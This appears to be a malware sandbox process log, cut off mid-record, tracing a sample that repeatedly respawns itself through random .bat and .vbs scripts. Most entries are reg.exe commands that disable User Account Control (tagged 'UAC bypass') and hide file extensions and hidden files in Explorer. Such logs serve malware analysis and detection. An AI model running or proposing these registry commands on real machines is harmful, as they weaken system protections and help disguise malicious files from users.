reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
192⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CkQsMIUc.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
192⤵
PID:1644

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
193⤵
PID:5032

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
190⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uAAIEcIo.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
190⤵
PID:4588

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
191⤵
PID:3424

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
190⤵
PID:4436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
190⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
188⤵
- Modifies visibility of file extensions in Explorer
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
188⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
188⤵
PID:3280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FYkAQosA.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
188⤵
PID:4164

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
189⤵
PID:2656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
186⤵
- Modifies visibility of file extensions in Explorer
PID:4964

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
186⤵
PID:2780

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
186⤵
PID:4828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pgYYIQMs.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
186⤵
PID:2180

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
187⤵
PID:4188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
184⤵
- Modifies visibility of file extensions in Explorer
PID:3836

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
184⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\osswgMsg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
184⤵
PID:4276

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
185⤵
PID:4580

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
184⤵
- UAC bypass
PID:948

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
182⤵
- Modifies visibility of file extensions in Explorer
PID:2956

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
182⤵
PID:3236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fAsAYUcA.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
182⤵
PID:60

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
183⤵
PID:2172

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
182⤵
- UAC bypass
PID:1880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PkEAEIUw.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
180⤵
PID:4480

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
181⤵
PID:2244

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
180⤵
PID:2084

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
180⤵
PID:4944

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
180⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QIgYEUkw.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
178⤵
PID:1848

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
179⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
178⤵
- UAC bypass
PID:1020

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
178⤵
PID:2160

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
178⤵
PID:4356

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
176⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3212

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
176⤵
- Modifies registry key
PID:2756

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
176⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dIMYsosY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
176⤵
PID:4164

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
177⤵
PID:4032

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
174⤵
- Modifies visibility of file extensions in Explorer
PID:1436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\niQogUoM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
174⤵
PID:1332

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
175⤵
PID:2280

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
174⤵
- UAC bypass
- Modifies registry key
PID:4692

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
174⤵
PID:2780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQcoEsEI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
172⤵
PID:1500

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
173⤵
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
172⤵
- UAC bypass
PID:4656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
172⤵
PID:4508

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
172⤵
- Modifies visibility of file extensions in Explorer
PID:4360

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
170⤵
- Modifies visibility of file extensions in Explorer
PID:4228

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
170⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OyEMEgsY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
170⤵
PID:2828

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
171⤵
PID:636

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
170⤵
PID:3892

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
168⤵
- Modifies visibility of file extensions in Explorer
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
168⤵
PID:2744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AgQcsosY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
168⤵
PID:2712

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
169⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
168⤵
- Modifies registry key
PID:4284

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
166⤵
- Modifies visibility of file extensions in Explorer
PID:2108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
166⤵
PID:3416

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
166⤵
PID:2064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wsUgMEEI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
166⤵
PID:4480

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
167⤵
PID:5100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uIAAkYIg.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
164⤵
PID:1848

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
165⤵
PID:4440

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
164⤵
PID:3588

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
164⤵
PID:440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
164⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
162⤵
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GeksogYA.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
162⤵
PID:4200

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
163⤵
PID:1424

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
162⤵
- UAC bypass
- Modifies registry key
PID:4660

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
162⤵
- Modifies visibility of file extensions in Explorer
PID:4340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
160⤵
PID:528

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
160⤵
- UAC bypass
- Modifies registry key
PID:1500

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
160⤵
PID:4100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HEkgoUMM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
160⤵
PID:3940

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
161⤵
PID:3736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dEMcAoQU.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
158⤵
PID:992

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
159⤵
PID:116

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
158⤵
- Modifies registry key
PID:3644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
158⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
158⤵
- Modifies visibility of file extensions in Explorer
PID:4712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\myYkssMs.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
156⤵
PID:2704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
157⤵
PID:4308

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
156⤵
- Modifies registry key
PID:1560

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
156⤵
- Modifies registry key
PID:4380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
156⤵
PID:3660

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
154⤵
- Modifies visibility of file extensions in Explorer
PID:2108

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
154⤵
- UAC bypass
PID:3432

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
154⤵
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Xewswosk.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
154⤵
PID:4900

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
155⤵
PID:4944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JYUAckcY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
152⤵
PID:4988

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
153⤵
PID:2520

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
152⤵
- Modifies registry key
PID:2352

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
152⤵
PID:1476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
152⤵
- Modifies visibility of file extensions in Explorer
PID:3068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sCYwAQkY.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
150⤵
PID:3880

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
151⤵
PID:2224

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
150⤵
PID:4120

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
150⤵
PID:3976

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
150⤵
- Modifies registry key
PID:3728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vKkYUsYI.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
148⤵
PID:1308

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
149⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
148⤵
- UAC bypass
- Modifies registry key
PID:592

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
148⤵
PID:1388

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
148⤵
PID:740

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
146⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
146⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MMsIwgsM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
146⤵
PID:3204

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
147⤵
PID:2328

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
146⤵
PID:3316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ayUQUIoQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
144⤵
PID:3236

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
145⤵
PID:3688

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
144⤵
- UAC bypass
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
144⤵
PID:3460

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
144⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qmwcwgoM.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
142⤵
PID:3468

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
143⤵
PID:3620

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
142⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
142⤵
- Modifies registry key
PID:3876

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
142⤵
PID:3432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MOEwoEIE.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
140⤵
PID:2756

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
141⤵
PID:2016

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
140⤵
- UAC bypass
PID:4992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
140⤵
PID:3896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
140⤵
- Modifies visibility of file extensions in Explorer
PID:1692

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
138⤵
PID:3132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uussUgQw.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
138⤵
PID:4328

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
139⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
138⤵
- UAC bypass
PID:3728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
138⤵
- Modifies visibility of file extensions in Explorer
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\koYIIEgQ.bat" "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe""
136⤵
PID:1156

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
137⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
136⤵
- UAC bypass
- Modifies registry key
PID:4360

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
136⤵
PID:3940

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
136⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1308

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
134⤵
- Modifies visibility of file extensions in Explorer
PID:992

C:\Windows\SysWOW64\cmd.exe
